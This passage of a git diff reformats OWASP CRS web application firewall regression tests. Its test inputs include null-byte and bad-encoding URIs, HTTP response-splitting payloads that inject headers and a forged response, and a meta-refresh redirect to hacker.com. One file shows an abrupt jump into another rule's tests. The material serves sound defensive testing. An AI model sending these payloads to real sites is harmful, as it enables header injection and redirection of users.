"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920250\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=%E2%A3" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log_contains: "id \"920250\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml index dc65d1722..4d73eb74e 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920260.yaml @@ -1,53 +1,49 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920260.yaml" description: "Description" +rule_id: 920260 tests: - - test_title: 920260-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=%uff0F" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920260\"" - - test_title: 920260-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=%uff0F" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920260\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=%u0F" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=%u0F" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920260\"" - # Test taken from existing modsec regression - test_title: 920260-3 + test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=foo%uFF01" - version: "HTTP/1.0" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - output: - log_contains: "id \"920260\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=foo%uFF01" + version: "HTTP/1.0" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + output: + log_contains: "id \"920260\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml index a71ca8d3c..c9f7b3bd5 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920270.yaml @@ -1,141 +1,131 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920270.yaml" description: "Description" +rule_id: 920270 tests: - - test_title: 920270-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%00=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920270\"" - - test_title: 920270-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%00=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920270\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%00" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920270\"" - - test_title: 920270-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%00" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920270\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%00=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920270\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%00=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920270\"" - # This causes apache to error before it gets to CRS. Therefore # we'll mark this as a status 400 now until the FTW OR output is added - test_title: 920270-4 + test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost%00" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - status: 400 - # log_contains: "id \"920270\"" - - test_title: 920270-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost%00" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + status: 400 + # log_contains: "id \"920270\"" + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Referer: "anything%00" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920270\"" - - test_title: 920270-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Referer: "anything%00" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920270\"" + - test_id: 6 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%40=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920270\"" - - test_title: 920270-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%40=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920270\"" + - test_id: 7 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%FD=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920270\"" - - test_title: 920270-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%FD=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920270\"" + - test_id: 8 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%FD=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920270\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%FD=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920270\"" - # Test converted from old tests - test_title: 920270-9 + test_id: 9 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?param=foo%00" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Language: "en-us,en;q=0.5" - Keep-Alive: "300" - Proxy-Connection: "keep-alive" - version: "HTTP/1.1" - output: - log_contains: "id \"920270\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?param=foo%00" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Language: "en-us,en;q=0.5" + Keep-Alive: "300" + Proxy-Connection: "keep-alive" + version: "HTTP/1.1" + output: + log_contains: "id \"920270\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml index bb265a1fe..ce37fa41d 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920271.yaml @@ -1,92 +1,85 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920271.yaml" description: "Description" +rule_id: 920271 tests: - - test_title: 920271-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%127" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920271\"" - - test_title: 920271-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%127" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920271\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%03" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920271\"" - - test_title: 920271-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%03" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920271\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test%00=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920271\"" - - test_title: 920271-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test%00=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920271\"" + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Cookie: hi%13=bye - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920271\"" - - test_title: 920271-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Cookie: hi%13=bye + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920271\"" + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/%20index.html?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920271\"" - - test_title: 920271-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/%20index.html?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920271\"" + - test_id: 6 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/%FFindex.html?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920271\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/%FFindex.html?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920271\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml index f4bfeb790..6f350b92a 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920272.yaml @@ -1,78 +1,72 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920272.yaml" description: "Description" +rule_id: 920272 tests: - - test_title: 920272-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%25" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920272\"" - - test_title: 920272-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%25" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920272\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%80" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920272\"" - - test_title: 920272-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%80" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920272\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/index.html?test=t%FFest1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920272\"" - - test_title: 920272-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/index.html?test=t%FFest1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920272\"" + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%35" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920272\"" - - test_title: 920272-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%35" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920272\"" + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/i%FFndex.html?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - status: 200 - log_contains: "id \"920272\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/i%FFndex.html?test=test1" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + status: 200 + log_contains: "id \"920272\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml index 0589dacc7..e66263274 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920273.yaml @@ -1,79 +1,73 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920273.yaml" description: "Description" +rule_id: 920273 tests: - - test_title: 920273-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1%20" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920273\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1%20" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log_contains: "id \"920273\"" - # the '&' is one of the only symbol allowed - test_title: 920273-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/?test=test1&test=t" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920273\"" - - test_title: 920273-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/?test=test1&test=t" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + no_log_contains: "id \"920273\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/index.html?test=test1" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "\n" - version: "HTTP/1.1" - output: - no_log_contains: id "921110" - - test_title: 921110-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/" + data: "var=budget foo)\n" + version: "HTTP/1.1" + output: + no_log_contains: id "921110" + - test_id: 11 desc: "HTTP Response Splitting false positive test issue 2054" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: "/" - data: "var=get it\n" - version: "HTTP/1.1" - output: - no_log_contains: id "921110" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: "/" + data: "var=get it\n" + version: "HTTP/1.1" + output: + no_log_contains: id "921110" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml index cc64c38aa..31bf2953d 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921120.yaml @@ -1,83 +1,77 @@ --- meta: author: csanders-git, Franziska Bühler - description: None - enabled: true - name: 921120.yaml +rule_id: 921120 tests: - - test_title: 921120-1 + - test_id: 1 desc: HTTP response splitting (921120) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: /?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0aShazam - version: HTTP/1.1 - output: - log_contains: id "921120" - - test_title: 921120-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: /?lang=foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2019%0d%0a%0d%0aShazam + version: HTTP/1.1 + output: + log_contains: id "921120" + - test_id: 2 desc: "HTTP Response splitting attack" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/file.jsp?somevar=foobar%0d%0aContent-Length:%2002343432423ftw" - version: HTTP/1.1 - output: - log_contains: id "921120" - - test_title: 921120-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/file.jsp?somevar=foobar%0d%0aContent-Length:%2002343432423ftw" + version: HTTP/1.1 + output: + log_contains: id "921120" + - test_id: 3 desc: "Fix FP issue 1615. Header followed by word chars." stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/file.jsp?somevar=%0A%0Dlocation:%0A%0D" - version: HTTP/1.1 - output: - no_log_contains: id "921120" - - test_title: 921120-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/file.jsp?somevar=%0A%0Dlocation:%0A%0D" + version: HTTP/1.1 + output: + no_log_contains: id "921120" + - test_id: 4 desc: "Status Page Test - Parameter with value 'CR.LF.Content-Length: 0' to match the rule's regular expression" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=%0d%0aContent-Length: 0" - version: HTTP/1.1 - output: - log_contains: id "921120" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=%0d%0aContent-Length: 0" + version: HTTP/1.1 + output: + log_contains: id "921120" diff --git a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml index 1bd49962f..3c54a10dc 100644 --- a/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml +++ b/tests/regression/tests/REQUEST-921-PROTOCOL-ATTACK/921130.yaml @@ -2,76 +2,70 @@ meta: author: "csanders-git, Franziska Bühler, azurit" description: None - enabled: true - name: 921130.yaml tests: - - test_title: 921130-1 + - test_id: 1 desc: HTTP response splitting (921130) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip, deflate - Accept-Language: zh-sg - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Referer: http - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/?lang=foobar%3Cmeta%20http-equiv%3D%22Refresh%22%20content%3D%220%3B%20url%3Dhttp%3A%2F%2Fwww.hacker.com%2F%22%3E" - version: "HTTP/1.1" - output: - log_contains: id "921130" - - test_title: 921130-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip, deflate + Accept-Language: zh-sg + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Referer: http + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/?lang=foobar%3Cmeta%20http-equiv%3D%22Refresh%22%20content%3D%220%3B%20url%3Dhttp%3A%2F%2Fwww.hacker.com%2F%22%3E" + version: "HTTP/1.1" + output: + log_contains: id "921130" + - test_id: 2 desc: "HTTP Response splitting attack: cookie data" 